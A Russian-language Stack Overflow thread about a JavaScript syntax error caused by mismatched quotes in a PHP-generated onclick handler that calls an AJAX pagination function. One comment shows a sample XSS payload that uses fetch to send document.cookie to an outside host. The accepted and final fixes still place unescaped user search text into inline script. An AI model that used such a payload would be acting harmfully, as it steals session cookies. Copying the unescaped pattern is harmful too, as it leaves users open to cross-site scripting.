# Unexpected end of input на чистом js. Все скобки проверил. Не использую JSON

Tags: javascript, php, ajax, синтаксис

Не могу понять что пропустил. Хочу выполнить ajax, передавая в функцию 3 параметра из файла php при нажатии на ссылку. До запуска функции консоль выводит *Uncaught SyntaxError: Unexpected end of input*. Так как использую MVC, ошибку выбивает на первой строке html файла.

Код JavaScript:

```
var dns = 'http://fmbteka.local/';
      
      function paginationAjax(page, media, searchText) {
        var URI = 'search/'+media+'/'+page+'/';

        var data = "search_text=" + searchText;

        var ajax = new XMLHttpRequest();
            ajax.open("POST", dns+URI, false);
            ajax.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

            ajax.send(data);

        var products = document.querySelector(".products");
            products.innerHTML = ajax.response;
      }
```

PHP:

```
if(isset($searchText)) {
    $page1right = "<a onclick='paginationAjax(".($page + 1).", '".$media."', '".$searchText."')'> ".($page + 1)." </a>";
}
```

Все переменные в php файле имеют тип строки (string)

Переменная $page1right передается в контроллер, который вставляет ее в представление.

Смотрел подобные вопросы на форумах, проблема у всех одинаковая - не закрыли скобку в jquery, или неправильно парсят JSON. Я не использую JSON и jquery, поэтому мне не понятно в чем допущена ошибка.

Comment: На этом сайте можно найти что-нибудь вроде: `');fetch('https://example.org/'+document.cookie+'`?

Answer (score 2, accepted):

Попробуйте заменить кавычки в `onclick`

```php
if(isset($searchText)) {
    $page1right = "<a onclick=\"paginationAjax(".($page + 1).", '".$media."', '".$searchText."')\"> ".($page + 1)." </a>";
}
```

Comment: Спасибо за вариант с ответом

Comment: Пожалуйста! Учитесь, развивайтесь!

Answer (score 1):

Посмотрите в браузере на значение атрибута `onclick`, и все станет ясно.

Comment: Спасибо, увидел что проблема в кавычках. Решил вопрос таким вариантом: 
if(isset($searchText)) {
 $pathStr = "'".$path."'";
 $searchTextStr = "'".$searchText."'";
 $page1right = '<a onclick="paginationAjax('.$pathStr.', '.$searchTextStr.')" style="cursor: pointer"> '.($page + 1).' </a>';
}

Comment: @Kirill Пожалуйста. Успехов.

Answer (score 1):

Спасибо, первый ответ мне помог. Была проблема в кавычках

Вот что получилось:

```
if(isset($searchText)) {
    $pathStr = "'".$path."'";
    $searchTextStr = "'".$searchText."'";
    $page1right = '<a onclick="paginationAjax('.$pathStr.', '.$searchTextStr.')" style="cursor: pointer"> '.($page + 1).' </a>';
}
```